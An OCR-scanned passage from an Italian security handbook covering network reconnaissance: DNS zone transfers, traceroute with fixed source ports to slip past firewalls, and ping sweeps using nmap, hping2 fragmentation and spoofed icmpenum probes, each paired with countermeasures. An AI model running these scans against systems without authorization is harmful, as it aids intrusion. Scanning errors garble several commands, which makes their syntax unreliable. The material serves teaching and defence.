quali informazioni si riescono a ottenere. Gli strumenti utilizzabili a questo sco- 
po sono numerosi, ma in questa sede ci limiteremo a considerare solo quelli più 
comuni. 

Per effettuare un trasferimento di zona, è sufficiente utilizzare il client nslookup di- 
sponibile nella maggior parte delle implementazioni di UNIX e Windows NT. 
nslookup può essere utilizzato in modo interattivo, come mostrato di seguito: 


[bash]$ nslookup 

Default Server: ns1.example.net 
Address: 10.10.20.2 

> 216.182.1.1 

Server: nsi.example.net 
Address: 10.10.20.2 

Name: gate.tellurian.net 
Address: 216.182.1.1 


> set type=any 
> ls -d Tellurian.net. >> /tmp/zone_out 


Per prima cosa eseguiamo nslookup in modalità interattiva. Una volta avviato, il 
programma riporta il server dei nomi predefinito a cui fa riferimento, che normal- 
mente corrisponde al server DNS dell’azienda o a un server DNS definito dal pro- 
prio ISP U/nternet Service Provider). Tuttavia, il nostro server DNS (10.10.20.2) non è 
quello di riferimento per il dominio obiettivo, quindi non conterrà i record DNS che 
ci interessano, È necessario, quindi, specificare manualmente a nslookup quale ser- 
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ver DNS interrogare. In questo esempio vogliamo utilizzare il server DNS primario 
di Tellurian Networks (216.182.1.1), che abbiamo identificato durante la ricerca 
whois sul dominio completata in precedenza. 

A questo punto impostiamo come tipo di record 47y (qualsiasi), per recuperare tutti 
i record DNS disponibili (per maggiori informazioni: man nslookup). 

Infine, utilizziamo l'opzione 1s per elencare tutti i record associati al dominio. Il pa- 
rametro -d restituisce l'elenco di tutti i record relativi al dominio. Al termine viene 
aggiunto un carattere “.” per specificare che il nome di dominio è completamente 
qualificato, anche se questo non è sempre richiesto. L’output del comando viene 
scaricato nel file /tmp/zone_out, per consentire successive elaborazioni. 

A] termine del trasferimento di zona, possiamo consultare il file alla ricerca di infor- 
mazioni utili che permettano di inquadrare meglio specifici sistemi. Di seguito è 
mostrata una simulazione dell’output, dal momento che le reti Tellurian non am- 
mettono trasferimenti di zona: 


{[bash]$ more zone_out 


acct18 1D INA 192.168.230.3 

1D IN HINFO "Gateway2000" "WinWKGRPS" 

1D IN MX 0 tellurianadmin-smtp 

1D IN RP bsmith.rci bsmith.who 

1D IN TXT "Location:Telephone Room" 
ce 1D IN CNAME aesop 
au 1D INA 192.168.230.4 

1D IN HINFO "Aspect" "MS-DOS" 

1D IN MX @® andromeda 

1D IN RP jcoy.erebus jcoy.who 

1D IN TXT "Location: Library" 
acct21 1D INA 192.168.230.5 

1D IN HINFO "Gateway2000" “"WinWKGRPS" 

1D IN MX 0 tellurianadmin-smtp 

1D IN RP bsmith.rci bsmith.who 

1D IN TXT "Location:Accounting" 


Non ci dilungheremo sulla descrizione di ogni record, ma esistono alcune tipologie 
che è importante citare. Come si può osservare, per ogni voce è riportato un record 
di tipo A (address), che rappresenta l'indirizzo IP della macchina, il cui nome è ri- 
portato sulla sinistra. Inoltre, per ogni host è presente un record HINFO che identi- 
fica la piattaforma o il tipo di sistema operativo in esecuzione (si veda la RFC-952). 
I record HINFO non sono necessari, ma forniscono a un hacker molte informazioni 
interessanti. Dopo aver salvato il risultato del trasferimento di zona in un file, è faci- 
le elaborarne il contenuto tramite programmi UNIX come grep, sed, awk o perl. 
Supponete di essere esperti di SunOS o Solaris. Potreste trovare programmatica- 
mente gli indirizzi IP a cui è associato un record HINFO contenente riferimenti a 
SPARC, Sun o Solaris: 


[bash]$ grep -i solaris zone_out {wc -1 
388 


Risultano 388 potenziali record contenenti un riferimento alla parola “Solaris”. I ber- 
sagli certo non ci mancano! 

Immaginate di voler identificare i sistemi di test, uno degli obiettivi prediletti dagli hac- 
ker. Perché? Il motivo è presto spiegato: di solito si tratta di macchine con pochi mec- 
canismi di protezione attivi, con password facili da indovinare, tendenzialmente più 
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trascurate dagli amministratori, che prestano meno attenzione a chi si collega. L'ideale 
per qualsiasi intruso. Per cercare i sistemi di test si può procedere nel modo seguente: 


[bash]$ grep -i test /tmp/zone_out |wc -1 
96 


Nel file di zona risultano circa 96 riferimenti alla parola “test”. Tutto sommato, tra 
questi dovremmo riuscire a identificare un buon numero di macchine di collaudo 
effettive. Questi sono solo alcuni semplici esempi. La maggior parte degli hacker è 
in grado di passare al setaccio questi dati e procedere a colpo sicuro verso sistemi 
con punti deboli accertati. 

Ci sono alcune considerazioni che è bene tenere presente. Il metodo descritto in 
precedenza interroga un solo server dei nomi per volta; questo significa che è ne- 
cessario ripetere le stesse attività per tutti i server di riferimento per il dominio scel- 
to come obiettivo. Inoltre, ci siamo limitati a esaminare il dominio Tellurian.net. 
In presenza di sottodomini, la stessa ricerca andrebbe ripetuta per ciascuno di que- 
sti (per esempio, greenhouse. Tellurian.net). Infine, il risultato del comando po- 
trebbe essere un messaggio che respinge la richiesta. Normalmente questo indica 
che il server è stato configurato in modo da impedire trasferimenti di zona verso 
utenti non autorizzati. Pertanto, non è possibile effettuare un trasferimento di zona 
da questo server. Tuttavia, se esistono diversi server DNS, non si può escludere la 
possibilità che almeno uno consenta l'operazione. 

Fino a questo punto vi abbiamo illustrato il metodo manuale, ma esistono molti stru- 
menti che permettono di velocizzare il processo, tra cui host, Sam Spade, axfr e dig. 
Il comando host è presente in molte varianti di UNIX. Ecco due semplici modi di 
utilizzo di host: 


host -l1 tellurian.net 


oppure: 


host -1 -v -t any tellurian.net 


Se il vostro scopo è ottenere un elenco di indirizzi IP da dare in pasto a uno script 
di shell, potete utilizzare il comando cut per ritagliare gli indirizzi IP dal risultato 
del comando host: 


host -1 tellurian.net j|jcut -f 4 -d" " >> /tmp/ip_out 


Non tutte le attività di footprinting richiedono l'utilizzo di comandi UNIX. Esiste un 
discreto numero di prodotti per Windows, come Sam Spade, in grado di fornire le 
stesse informazioni. 

Infine, vogliamo ricordare uno dei migliori tool per trasferimenti di zona: axfr (http: 
//packetstormsecurity.nl/groups/ADM/axfr-0.5.2.tar.gz) sviluppato da Gaius. 
Questo programma è in grado di trasferire le informazioni sulla zona in modo ricorsi- 
vo, creando un database compresso dei file relativi alla zona e agli host per ogni domi- 
nio esaminato. Inoltre, accetta persino domini di primo livello come com ed edu, resti- 
tuendo l’elenco di tutti i domini a essi associati (è un utilizzo possibile, ma altamente 
sconsigliato). La sintassi da utilizzare per eseguire axfr è la seguente: 


[bash]$ axfr tellurian.net 
axfr: Using default directory: /root/axfrdb 
Found 2 name servers for domain 'tellurian.net.': 
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Text deleted. 
Received XXX answers (XXX records). 


Per interrogare il database axfr si utilizza invece il comando: 


[bash]$ axfrcat tellurian.net 


Analisi dei record MX (Mail Exchange) 


L'individuazione del punto in cui viene gestita la posta è un ottimo indizio per loca- 
lizzare la rete di firewall dell’obiettivo. Spesso, in ambienti commerciali, la posta 
viene gestita sugli stessi sistemi su cui risiede il firewall, o almeno nella stessa rete. 
In questi casi, il comando host permette di raccogliere ulteriori informazioni: 


[bash]$ host tellurian.net 

tellurian.net has address 216.182.1.7 

tellurian.net mail is handled (pri=1@0) by mail.tellurian.net 
tellurian.net mail is handled (pri=20) by smtp-forward.tellurian.net 


OD) Contromisura: protezione del DNS 


I dati relativi al DNS sono una miniera di informazioni per gli hacker, quindi diventa im- 
portante ridurre al minimo la quantità di dati disponibili su Internet. Dal punto di vista 
della configurazione di un host, è opportuno limitare la possibilità di trasferimento della 
zona ai soli server autorizzati. Nelle versioni più recenti di BIND, per imporre tale restri- 
zione è possibile specificare all’interno del file named.conf la direttiva allow-transfer. 
Nel caso del DNS di Microsoft, per vincolare i trasferimenti di zona è possibile utilizzare 
l'opzione Notify. (Per maggiori informazioni, si veda http://support.microsoft. 
com/support/kb/articles/q193/8/37.asp.) Per altri server dei nomi, vi rimandiamo 
alla relativa documentazione. 

Per quanto riguarda la rete, potreste configurare un firewall o filtri sui pacchetti per 
un router in modo da respingere tutte le connessioni in ingresso sulla porta TCP 53. 
Poiché le richieste di ricerca sui nomi si servono di UDP e quelle di trasferimento di 
zona di TCP, in questo modo verrebbero ostacolati possibili tentativi di trasferimen- 
to di zona. Tuttavia questa contromisura è una violazione dell’RFC, che stabilisce 
che le indagini DNS superiori a 512 byte vengano inviate tramite TCP. Nella mag- 
gior parte dei casi, le indagini sui DNS ricadranno facilmente nel limite dei 512 byte. 
Una soluzione migliore sarebbe l’implementazione delle firme di transazione (TSIG, 
Transaction STGnatures) crittografiche, per consentire unicamente a host sicuri di 
trasferire informazioni di zona. Per un esempio dettagliato dell’implementazione 
della sicurezza TSIG in Bind9, visitate l’indirizzo http://www.linux-mag.com 
/2001-11/bind9_01.html. 

Ponendo vincoli sui trasferimenti di zona si ostacola l’attività di ricerca di indirizzi IP e 
nomi host da parte di un hacker. Tuttavia, essendo la ricerca dei nomi comunque con- 
sentita, l’intruso potrebbe eseguire manualmente una ricerca su tutti gli indirizzi IP 
all'interno di un certo blocco della rete. Per questo, cercate di configurare i server dei 
nomi esterni in modo da fornire esclusivamente informazioni sui sistemi direttamente 
collegati a Internet, evitando il più possibile di divulgare informazioni sulla rete interna. 
Potrà sembrarvi banale, ma abbiamo incontrato situazioni in cui l’errata configurazione 
dei server dei nomi consentiva di scaricare l’elenco di più di 16.000 indirizzi IP interni e 
dei relativi nomi host. Infine, evitate il più possibile l'utilizzo dei record HINFO. Come 
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vedremo nei prossimi capitoli, è comunque possibile identificare con precisione il siste- 
ma operativo di una specifica macchina, ma i record HINFO rendono fin troppo sempli- 
ce l’identificazione automatica dei sistemi potenzialmente più vulnerabili. 


Passaggio 4: perlustrazione della rete 


Una volta identificate le potenziali reti, possiamo cercare di stabilirne la topologia e 
individuare possibili percorsi di accesso. 


® Tracerouting 


Diffusione: 9 
Semplicità: 9 
Impatto: Pi; 
Fattore di rischio: ea 


A questo scopo si può utilizzare il programma traceroute (ftp://ftp.ee.lbl 
.gov/traceroute.tar.gz), disponibile nella maggior parte delle varianti di UNIX e 
in Windows NT (in questo caso il nome del programma è contratto in tracert, per 
mantenere la compatibilità con i nomi di file 8.3). 

traceroute, sviluppato originariamente da Van Jacobson, è uno strumento diagno- 
stico che permette di risalire al percorso seguito da un pacchetto IP nel passaggio 
da un host a quello successivo; esso sfrutta la proprietà TTL (Time To Live) del pac- 
chetto IP per ottenere un messaggio ICMP TIME_EXCEEDED da ogni router. Poiché 
ogni router attraversato dal pacchetto deve diminuirne il valore del campo TTL, 
questo diventa a tutti gli effetti un contatore dei “salti” e consente di utilizzare tra - 
ceroute per stabilire il percorso esatto seguito dai pacchetti. Come già detto, ser- 
vendosi di traceroute si può ricostruire la topologia della rete obiettivo, riuscendo 
inoltre a identificare eventuali dispositivi di controllo degli accessi (firewall software 
o router con filtri sui pacchetti). 

Vediamo un esempio pratico: 


[bash]$ traceroute tellurian.net 

raceroute to tellurian.net (216.182.1.7), 30 hops max, 38 byte packets 
(205.243.210.33) 4.264 ms 4.245 ms 4.226 ms 

(66.192.251.0) 9.155 ms 09.181 ms 9.180 ms 

(168.215.54.90) 9.224 ms 9.183 ms 9.145 ms 

(144.232.192.33) 9.660 ms 9.771 ms 9.737 ms 

(144,232.1.217) 12.654 ms 10.145 ms 9,945 ms 

(144.232.1.173) 10.235 ms 9.968 ms 10.024 ms 

(144,232.8.97) 133.128 ms 77.520 ms 218.464 ms 

(144.232.18.78) 65.065 ms 65.189 ms 65.168 ms 

(144.232.16.252) 64.998 ms 65.021 ms 65.301 ms 

10 (144.223.,15.130) 82.511 ms 66.022 ms 66.170 

11 www.tellurian.net (216.182.1.7) 82.355 ms 81.644 ms 84,238 ms 


O0ONDUIpAPGN- 


È stato ricostruito il percorso dei pacchetti che arrivano a destinazione dopo diversi 
salti. Nel passaggio attraverso le tappe intermedie, i pacchetti non vengono blocca- 
ti. Assumeremo che ww.tellurian.net sia un host attivo e che il salto che lo pre- 
cede (il numero 10) costituisca il router estremo della rete aziendale, che potrebbe 
essere un applicativo di firewalling dedicato o un dispositivo di filtraggio dei pac- 
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chetti (non è possibile saperlo). Generalmente, quando vi collegate a un host attivo 
sulla rete, il dispositivo che lo precede svolge funzionalità d'instradamento: potreb- 
be essere, per esempio, un router o un firewall. 

Questo è un esempio estremamente semplificato: in ambienti complessi potrebbero 
esistere diversi percorsi di instradamento, ovvero dispositivi di instradamento con va- 
rie interfacce (come i router Cisco della serie 7500). Inoltre, su ogni interfaccia potreb- 
bero essere definite liste di controllo degli accessi (ACL, Access Contro! List) differenti. 
In molti casi, alcune interfacce consentono il passaggio di richieste traceroute men- 
tre altre le bloccano, proprio a causa delle diverse ACL definite. Per questo motivo è 
essenziale ricostruire una mappa dell'intera rete con traceroute. Una volta ottenuto 
il percorso a diversi sistemi sulla rete, è possibile rappresentare su un diagramma di 
rete l’architettura del gateway verso Internet e la localizzazione dei dispositivi che ge- 
stiscono il controllo degli accessi. Possiamo definire questo grafico diagramma dei 
percorsi di accesso. 

È importante ricordare che la maggior parte delle versioni di traceroute in am- 
biente UNIX utilizza di default pacchetti UDP (User Datagram Protocol), pur preve- 
dendo anche l'invio di pacchetti ICMP Unternet Control Messaging Protocol) con 
l'opzione -I. In Windows NT, invece, il comportamento predefinito prevede l’invio 
di pacchetti ICMP di tipo echo request. Di conseguenza, i risultati ottenuti con stru- 
menti diversi potrebbero non corrispondere, se il sito filtra i pacchetti UDP piuttosto 
che ICMP. Un'altra interessante opzione di traceroute è -g, che consente all’uten- 
te di utilizzare il source routing. Quindi, se pensate che il gateway di destinazione 
accetti pacchetti con instradamento impostato dal nodo di origine, potreste provare 
ad attivare questa opzione e specificare opportunamente le tappe intermedie (per 
maggiori informazioni, consultate le pagine man su traceroute sotto UNIX). 
Esistono anche altri parametri che potrebbero consentire il superamento di dispositivi 
di controllo degli accessi durante la perlustrazione. L'opzione -p n di traceroute 
consente di specificare un numero di partenza per la posta UDP (#), che viene incre- 
mentato di 1 al lancio della sonda. Di conseguenza, non è possibile utilizzare una 
specifica porta senza intervenire su traceroute. Fortunatamente, Michael Schiffman 
ha implementato una modifica di traceroute (http://ww.packetfactory.net/ 
Projects/firewalk/traceroute.diff) che aggiunge l'opzione -$ per interrompere 
l'incremento della porta, disponibile a partire dalla versione 1.4a5 (ftp.cerias 
.purdue.edu/pub/tools/unix/netutils/traceroute/old/). Questo comporta che 
ogni pacchetto inviato utilizzi un numero di porta prestabilito, nella speranza che il 
controllo degli accessi lo lasci passare. Un buon punto di partenza può essere la porta 
UDP 53 (interrogazioni DNS). Visto che la maggior parte dei siti accetta l’ingresso di 
interrogazioni DNS, la probabilità che la sonda riesca a superare il controllo degli ac- 
cessi è piuttosto alta: 


[bash]$ traceroute 10.10.10.2 
traceroute to (10.10.10.2), 30 hops max, 40 byte packets 


1 gate (192.168.10.1) 11.993 ms 10.217 ms 9.023 ms 

2 rtri.bigisp.net (10.10.12,13)37.442 ms 35.183 ms 38.202 ms 

3 rtr2.bigisp.net (10.10.12.14) 73.945 ms 36.336 ms 40.146 ms 

4 hssitrt.bigisp.net (10.11.31.14) 54.094 ms 66.162 ms 50.873 ms 
5 * * * 

6 * * * 


Come si può vedere, le sonde di traceroute, che di default utilizzano pacchetti 
UDP, sono state bloccate dal firewall. 
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Proviamo allora a inviare una sonda utilizzando la porta UDP 53, riservata alle inter- 
rogazioni DNS: 


[bash]$ traceroute -S -p53 10.10.10.2 

traceroute to (109.19.10.2), 30 hops max, 40 byte packets 

gate (192.168.10.1) 10.029 ms 10.027 ms 8.494 ms 
rtri.bigisp.net (10.10.12.13) 36.673 ms 39.141 ms 37.872 ms 
rtr2.bigisp.net (19.10.12.14) 36.739 ms 39.516 ms 37.226 ms 
hssitrt.bigisp.net (10.11.31.14)47.352 ms 47.363 ms 45.914 ms 
10.10.10.2 (10.10.10.2) 50.449 ms 56.213 ms 65.627 ms 


CAQGNE 


In questo caso i pacchetti vengono accettati dal controllo degli accessi (salto 4). 
Quindi, per sondare i sistemi dietro a dispositivi di controllo degli accessi è suffi- 
ciente inviare i pacchetti utilizzando la porta di destinazione UDP 53. Inoltre, se si 
invia una sonda a un sistema che risulta in ascolto sulla porta UDP 53, non si riceve 
in risposta un normale messaggio ICMP di destinazione non raggiungibile. In questi 
casi, quando il pacchetto raggiunge la sua destinazione finale, nell'elenco non viene 
riportato il relativo host. 

La maggior parte delle operazioni effettuate finora con traceroute ha sfruttato la li- 
nea di comando. Chi preferisce gli ambienti grafici può invece utilizzare VisualRou- 
te (mw.visualroute.com) o NeoTrace (http://ww.neotrace.com) per realizzare 
il tracciamento dei percorsi. VisualRoute rappresenta graficamente i singoli salti e 
integra le informazioni esposte utilizzando interrogazioni whois. VisualRoute, visi- 
bile nella Figura 1.6, ha un aspetto piuttosto accattivante, ma è poco adatto alla per- 
lustrazione di reti su vasta scala. 
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Figura 1.6 


VisualRoute, la Cadillac dei programmi di traceroute, tra le informazioni sui nodi di connessione fornisce 
anche la collocazione geografica, la decodifica whois e notizie sul banner del server. 
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Esistono altre tecniche che consentono di ottenere le specifiche ACL definite su un 
particolare dispositivo di controllo degli accessi. Tra queste ricordiamo la scansione 
dei protocolli sul firewall, descritta nel Capitolo 11. 


D Contromisura: ostacolare la perlustrazione della rete 


In questo capitolo ci siamo limitati ad accennare alle tecniche di perlustrazione del- 
la rete; nei capitoli seguenti illustreremo tecniche decisamente più intrusive. Tutta- 
via, esistono diverse contromisure che consentono di ostacolare e identificare le 
sonde inviate per perlustrare la rete viste fino a questo punto. Molti dei programmi 
commerciali per il riconoscimento delle intromissioni (NIDS, Network Intrusion De- 
tection Systems) che vedremo in seguito sono in grado di intercettare questo tipo di 
attività; tra questi c'è snort (http: //ww.snort.org/) di Marty Roesch, uno dei mi- 
gliori programmi NIDS gratuiti. Se desiderate contrattaccare quando riconoscete un 
tentativo di traceroute, Humble di Rhino9 ha sviluppato il programma RotoRouter 
(http://www.ussrback.com/UNIX/loggers/rr.c.gz), che registra le richieste di 
traceroute e genera messaggi di avviso. Infine, in funzione della politica di prote- 
zione del vostro sito, potreste decidere di configurare i router di interfaccia con 
l'esterno in modo da limitare il traffico ICMP e UDP a sistemi specifici, per ridurre il 
più possibile il rischio. 


Capitolo 2 
Scansione 


Se il footprinting è analogo alla ricognizione per la raccolta di informazioni, la scan- 
sione equivale al bussare su tutte le pareti per trovare porte e finestre. Nella prima 
fase abbiamo ricostruito un elenco di indirizzi IP attraverso una serie di interroga- 
zioni whois e il prelevamento dei dati relativi alle zone: le informazioni ottenute 
sono estremamente preziose per un attacco e spaziano dai nomi e numeri di telefo- 
no dei dipendenti, agli intervalli di indirizzi IP, ai server DNS e della posta. Il passo 
successivo consiste nello stabilire quali sistemi siano attivi e raggiungibili via Inter- 
net utilizzando una serie di strumenti e tecniche come ping sweep, la scansione del- 
le porte e il tool di ricerca automatica. 

È importante ricordare che la presenza di un indirizzo IP nell’elenco generato da un 
trasferimento di zona non comporta necessariamente che questo sia raggiungibile 
da Internet. Dovremo controllare tutti i possibili sistemi bersaglio, verificando se sia- 
no attivi e se siano in ascolto su qualche porta. Ci è capitato spesso di trovare server 
dei nomi che, a causa di errori di configurazione, espongono l’elenco degli indirizzi 
IP presenti sulle reti private (per esempio, 10.10.10.0). Poiché non è consentito l’in- 
stradamento verso questi indirizzi passando da Internet, raggiungerli direttamente 
sarebbe molto difficile. Per ulteriori informazioni sugli intervalli di indirizzi IP per i 
quali non è consentito l’instradamento su Internet consultate la RFC 1918 (http: // 
ww.ietf.org/rfc/rfc1918.txt). 

Passiamo ora alla fase successiva alla raccolta delle informazioni: la scansione. 


Determinazione dello stato di attività del sistema 


Uno dei primi passi del processo di ricostruzione della mappa di una rete consiste 
nell'esecuzione automatizzata di una serie di comandi ping su un intervallo di indiriz- 
zi IP e blocchi di rete, al fine di determinare quali sistemi siano attivi. Questa opera- 
zione è definita, appunto, ping sweep. Normalmente il comando ping viene utilizzato 
per inviare pacchetti IIMP ECHO (Tipo 8) a un sistema preso come obiettivo, solleci- 
tando la restituzione di un pacchetto ICMP ECHO_REPLY (Tipo 0), che indica che il 
Sistema è in funzione. Se può essere accettabile per stabilire il numero di sistemi attivi 
in una rete di piccole o medie dimensioni, questo metodo diventa decisamente ineffi- 
ciente per reti più estese. La scansione di una rete di Classe A, per esempio, potrebbe 
richiedere ore o giorni. È necessario apprendere diversi metodi per scoprire i sistemi 
attivi; i paragrafi successivi presentano un esempio delle tecniche disponibili. 
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È) Ping sweep 


Diffusione: 10 
Semplicità: 9 
Impatto: 3 
Fattore di rischio: 7 


Per semplificare l'esecuzione di un ping sweep è possibile utilizzare uno dei nume- 
rosi strumenti disponibili sia per UNIX sia per Windows NT. Una tecnica ormai con- 
solidata nel mondo UNIX utilizza fping (http://packetstorm.security.com/ 
Exploit Code Archive/fping.tar.gz). A differenza degli strumenti per ping 
sweep tradizionali, che attendono la risposta di un sistema prima di passare al suc- 
cessivo potenziale host, fping invia blocchi di richieste di ping in parallelo, a rota- 
zione. Di conseguenza, fping è in grado di scorrere gruppi di indirizzi IP in tempi 
decisamente minori rispetto al semplice ping. fping può essere utilizzato in due 
modi: fornendogli una serie di indirizzi IP da stdin o leggendo un file. La lettura da 
un file è semplice poiché è sufficiente creare il file con indirizzi IP su ogni riga: 


192.168.51.1 
192.168.51.2 
192.168.51.3 


192.168 .51.253 
192.168.51.254 


Quindi si utilizza il parametro -f per leggere all'interno del file: 


[tsunami]$ fping -f in.txt 
192.168.1.254 is alive 
192.168.1.227 is alive 
192.168.1.224 is alive 


192.168.1.3 is alive 
192.168.1.2 is alive 
192.168.1.1 is alive 
192.168.1.190 is alive 


L’opzione -a di fping si limita a restituire l'elenco dei sistemi in funzione. Volendo, 
è possibile specificare anche il parametro -d per risolvere i nomi host. Noi consi- 
gliamo sempre di utilizzare l'opzione -a all’interno di script di shell e -d quando si 
desidera focalizzare l’attenzione su sistemi con nomi host univoci. Tra le altre op- 
zioni ricordiamo -f, per la lettura da file, che può risultare utile nella scrittura di 
script per ping sweep. Il comando fping -h restituisce l'elenco completo delle op- 
zioni disponibili. Un altro strumento che compare spesso in questo libro è nmap di 
Fyodor (ww.insecure.org/nmap). Una descrizione dettagliata verrà fornita nel 
prosieguo del capitolo; in questa sede ci interessa unicamente sottolineare che sup- 
porta il ping sweep attraverso l'opzione - SP: 


[tsunami] nmap -sP 192.168.1.0/24 


Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ ) 
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Host (192.168.1.0) seems to be a subnet broadcast 


address (returned 3 extra pings). 

Host (192.168.1.1) appears to be up. 

Host (192.168.1.10) appears to be up. 

Host (192.168.1.11) appears to be up. 

Host (192.168.1.15) appears to be up. 

Host (192.168.1.20) appears to be up. 

Host (192.168.1.50) appears to be up. 

Host (192.168.1.101) appears to be up. 

Host (192.168.1.102) appears to be up. 

Host (192.168.1.255) seems to be a subnet broadcast 
address (returned 3 extra pings). 

Nmap run completed -- 256 IP addresses (10 hosts up) scanned in 21 seconds 


Agli adepti di Windows possiamo consigliare il prodotto freeware Pinger (Figura 
2.1) di Rhino9 (http://ww/.nmrce.org/files/snt/), che è uno dei sistemi per 
ping sweep più veloci tra quelli disponibili. Analogamente a fping, Pinger invia di- 
versi pacchetti ICMP ECHO in parallelo e si limita ad attendere e ascoltare le rispo- 
ste. Allo stesso modo, Pinger consente la risoluzione dei nomi host e il salvataggio 
dell’output in file. Analogo a Pinger per velocità è il prodotto commerciale Ping 
Sweep di SolarWinds (mw.solarwinds.net), il quale riesce a essere straordinaria- 
mente veloce perché consente di indicare un intervallo tra due invii di pacchetti 
consecutivi. Impostando questo valore a 0 o 1, si riesce a effettuare la scansione di 
un'intera rete di Classe C e risolvere i nomi host in meno di sette secondi. Prestate 
attenzione a questi strumenti, però: basta veramente poco per saturare connessioni 
lente come una linea ISDN a 128 K o un collegamento Frame Relay, per non parlare 
di collegamenti via satellite o a infrarossi. 


Figura 2.1 


Pinger di Rhino9 è una delle più veloci utilità di esplorazione ed è gratuito. 
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Tra gli altri strumenti per ping sweep disponibili per Windows ricordiamo WS_Ping 
ProPack (ww. ipswitch.com) e i NetScanTools (ww. nwpsw.com), che, pur essendo 
adeguati per reti di piccole dimensioni, sono sensibilmente meno veloci di Pinger e 
Ping Sweep. Ricordate che se da un lato questi strumenti con interfaccia grafica pre- 
sentano i risultati in una veste certamente più gradevole, dall’altro limitano forte- 
mente la possibilità di utilizzo all’interno di script e di automazione dei ping sweep. 
Forse vi state chiedendo cosa succede se l'interrogazione ICMP viene bloccata 
dal sito preso come obiettivo. Buona domanda. Non è raro incontrare siti gestiti 
seriamente che bloccano i messaggi ICMP in corrispondenza del router o del 
firewall di interfaccia. Sebbene sia possibile bloccare l’ICMP, esistono altri stru- 
menti e tecniche utilizzabili per stabilire se i sistemi siano effettivamente in fun- 
zione, ma nessuno riesce a raggiungere l'accuratezza e l'efficienza di un norma- 
le ping sweep. 

Quando il traffico ICMP viene bloccato, la scansione delle porte diventa la prima 
tecnica per identificare gli host attivi. (La scansione delle porte verrà descritta detta- 
gliatamente nel prosieguo del capitolo.) La scansione delle porte più comuni su tutti 
gli indirizzi IP potenziali permette di stabilire quali sistemi siano attivi attraverso 
l'identificazione di porte aperte o in ascolto sul sistema obiettivo. Si tratta di una tec- 
nica estremamente onerosa in termini di tempo e non sempre risolutiva. Uno degli 
strumenti utilizzati per la scansione delle porte è nmap, che come abbiamo già visto 
supporta l'esecuzione di sweep ICMP. Tuttavia, prevede un’opzione decisamente 
più avanzata: il cosiddetto 7CP ping scan. Questa opzione viene eseguita specifi- 
cando l’opzione -PT e il numero di porta 80. Utilizziamo la porta 80 perché è una di 
quelle di utilizzo più comune e solitamente non viene bloccata dai router “di confi- 
ne” che portano a sistemi nella zona demilitarizzata (DMZ). In certi casi con questa 
porta si riescono persino a superare i firewall principali. Con questa opzione vengo- 
no spediti alla rete obiettivo pacchetti TCP ACK, quindi si aspetta una risposta RST 
che indica che l'host è attivo. Vengono inviati i pacchetti ACK in quanto dovrebbero 
oltrepassare la maggior parte dei firewall: 


[tsunami] nmap -sP -PT80 192.168.1.0/24 

TCP probe port is 80 

Starting nmap V. 2.53 

Host (192.168.1.0) appears to be up. 

Host (192.168.1.1) appears to be up. 

Host shadow (192.168.1.10) appears to be up. 
Host (192.168.1.11) appears to be up. 

Host (192.168.1.15) appears to be up. 

Host (192.168.1.20) appears to be up. 

Host (192.168.1.50) appears to be up. 

Host (192.168.1.101) appears to be up. 

Host (192.168.1.102) appears to be up. 

Host (192.168.1.255) appears to be up. 

Nmap run completed (10 hosts up) scanned in 5 seconds 


Come potete vedere, questo metodo si rivela piuttosto efficace nel determinare qua- 
li sistemi siano attivi anche se il sito blocca i pacchetti ICMP. Vale la pena di ripetere 
questo tipo di scansione su una serie di porte di utilizzo comune, come SMTP (25), 
POP (110), AUTH (113), IMAP (143), o altre specifiche del sistema. 

Hping2 (http://www.hping.org) è un’altra utility per ping su TCP e offre una serie 
di funzionalità aggiuntive rispetto a nmap. 

Hping2 permette all'utente di controllare alcune proprietà dei pacchetti TCP che po- 
trebbero consentire il superamento del controllo degli accessi. Se si imposta la porta 
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di destinazione con l'opzione -p, per esempio, si può riuscire a superare dispositivi 
per il controllo degli accessi simili a traceroute, descritto nel Capitolo 1. Hping2 
può essere utilizzato per effettuare ping sweep su TCP e offre la possibilità di spez- 
zare i pacchetti in frammenti che potrebbero superare alcuni tipi di controllo: 


[jack]# hping2 192.168.0.2 -S -p 80 -f 

HPING 192.168.0.2 (eth0 192.168.0.2): S set, 40 data bytes 

60 bytes from 192.168.0.2: flags=SA seq=0 tt1=64 id=418 Win=5840 time=3.2 
mms 

60 bytes from 192,168.0.2: flags=SA seq=1 tt1=64 id=420 win=5840 time=2,1 
Mems 

60 bytes from 192,168.0.2: flags=SA seq=2 tt1=64 id=422 win=5840 time=2.0 
mms 


--- 192.168.0.2 hping statistic --- 
3 packets tramitted, 3 packets received, 0% packet loss 


In certe condizioni i dispositivi per il controllo degli accessi più semplici non 
riescono a gestire correttamente pacchetti frammentati: questo consente ai pac- 
chetti di procedere e stabilire se il sistema target sia attivo. Tenete presente che 
i flag TCP SYN (S) e TCP ACK (A) vengono sempre restituiti se una porta è aper- 
ta. Hping2 può essere facilmente integrato in script di shell tramite l'opzione di 
conteggio dei pacchetti -cN, dove N è il numero di pacchetti da inviare prima di 
procedere. Questo metodo, pur non essendo veloce quanto alcuni metodi di 
ping sweep su ICMP illustrati in precedenza, potrebbe essere necessario, in rela- 
zione alla configurazione della rete obiettivo. Per una descrizione dettagliata di 
hping vi rimandiamo al Capitolo 11. 

l’ultimo strumento che prendiamo in esame è icmpenum, realizzato da Simple No- 
mad (http://www.nmrc.org/files/sunix/icmpenum-1.1.1.tgz). Questo pro- 
gramma di utilità è un pratico strumento di enumerazione ICMP che consente di 
identificare rapidamente i sistemi attivi inviando i tradizionali pacchetti ICMP 
ECHO oltre alle richieste ICMP TIME STAMP REQUEST e ICMP INFO. Pertanto, se 
i pacchetti ICMP ECHO di ingresso sono scartati da un router di confine o da un 
firewall, è ancora possibile identificare i sistemi utilizzando un tipo ICMP alterna- 
tivo: 


[shadow] icmpenum -i2 -c 192.168.1.0 
192.168.1.1 is up 

192.168.1.10 is up 

192.168.1.11 is up 

192.168.1.15 is up 

192.168.1.20 is up 

192.168.1.103 is up 


In questo esempio, abbiamo enumerato l’intera rete di classe C 192.168.1.0 utiliz- 
zando una richiesta ICMP TIME STAMP REQUEST. Tuttavia, la vera potenza di icm- 
penum risiede pella capacità di identificare i sistemi utilizzando pacchetti contraffatti 
per evitare l’intercettazione. Questa tecnica è resa possibile dal fatto che icmpenum 
supporta l’utilizzo di pacchetti contraffatti con l'opzione -s e passivamente ascolta 
le risposte con il parametro -p. 

Riassumendo, questa fase consente di stabilire esattamente quali sistemi siano attivi, 
attraverso una scansione ICMP o su porte specifiche. Nel nostro esempio abbiamo 
accertato che, sui 255 potenziali indirizzi di Classe C, diversi host sono attualmente 
